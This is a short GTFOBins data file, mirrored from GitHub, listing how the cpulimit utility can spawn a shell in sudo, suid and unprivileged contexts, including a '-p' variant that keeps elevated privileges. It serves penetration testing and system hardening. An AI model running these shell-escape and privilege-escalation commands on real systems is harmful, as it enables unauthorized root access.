1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-09 15:36:21 +01:00
GTFOBins.github.io/_gtfobins/cpulimit
2026-01-01 22:14:51 +01:00

13 lines
189 B
Plaintext

---
functions:
shell:
- code: |-
cpulimit -l 100 -f /bin/sh
contexts:
sudo:
suid:
code: |-
cpulimit -l 100 -f /bin/sh -p
unprivileged:
...